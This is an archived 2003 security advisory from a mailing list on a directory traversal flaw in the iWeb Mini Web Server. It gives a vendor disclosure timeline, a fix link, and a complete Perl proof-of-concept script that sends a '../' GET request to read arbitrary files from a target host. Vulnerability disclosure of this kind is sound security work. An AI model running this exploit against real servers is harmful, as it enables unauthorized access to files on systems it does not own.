[VulnWatch] SFAD03-001: iWeb Mini Web Server Remote Directory Traversal

From: subversive (subversive@linuxmail.org)
Date: 04/16/03

  • Next message: zillion: "[VulnWatch] Apache mod_access_referer denial of service issue" 
    From: "subversive " <subversive@linuxmail.org>
To: vulnwatch@vulnwatch.org
Date: Wed, 16 Apr 2003 16:24:13 +1200

      [=================================================================]
      [...............:[ S e c u r i t y F r e a k s ]:...............]
      [.................:[ www.securityfreaks.com ]:..................]
      [=================================================================]

    Title : iWeb Mini Web Server Remote Directory Traversal
    Risk : Moderate - Low
    Software : iWeb Mini Web Server
    Platforms : Windows NT/XP/9x
    Vendor URL : http://www.ashleybrown.co.uk/iweb/
    Discovered by : subversive <subversive@linuxmail.org>
    Advisory ID : SFAD03-001

    .....:[ Overview :

    The iWeb Mini Web Server is a mini web server designed for use on
    Intranets and for testing websites in a realistic environment.

    .....:[ Details :

    iWeb does not correctly filter GET requests for ../ characters
    thereby allowing us to escape the webroot and remotely traverse
    the directory structure of the remote host.

    .....:[ Vendor Status :

    14/04/03 Initial Contact Made
    15/04/03 Vendor Responded
    15/04/03 Vendor Released Updated Version

    .....:[ Solution :

    Remove old iWeb application and download and install the updated
    version which can be found at:

    http://ashleybrown.co.uk/downloads/iws2.exe

    .....:[ Exploit - SF-iwsuk.pl :

    #!/usr/bin/perl -w
    #
    # S e c u r i t y F r e a k s
    # www.securityfreaks.com
    #
    # iWeb Mini Web Server Remote Directory Traversal
    #
    # subversive[at]linuxmail.org - *15/04/2003*

    use IO::Socket;

    if(!$ARGV[0]) {
    print <<"IWEBSUK";

       S e c u r i t y F r e a k s
         www.securityfreaks.com

      -------------------------------------------------------------
      SF-iwsuk.pl - iWeb Mini Web Server Remote Directory Traversal
      -------------------------------------------------------------
      Usage: $0 <host> <file> <port>

    IWEBSUK
    exit;
    }

    else{
    $host = $ARGV[0];
    }

    if(!$ARGV[2]) {
    $port = "80";
    }

    else {
    $port = $ARGV[2];
    }

    my $sock = new IO::Socket::INET ( Proto => "tcp",
                                      PeerAddr => $host,
                                      PeerPort => $port,
                                    );
    die "\nConnection to $host:$port failed\n" unless $sock;

    print $sock "GET /../../../../../../../../../$ARGV[1] HTTP/1.0\n\n";
    while(<$sock>) { print }
    close($sock);
    print("\n\n");
    exit; 

    -- 
______________________________________________
http://www.linuxmail.org/
Now with e-mail forwarding for only US$5.95/yr
Powered by Outblaze
  • Next message: zillion: "[VulnWatch] Apache mod_access_referer denial of service issue"

    Relevant Pages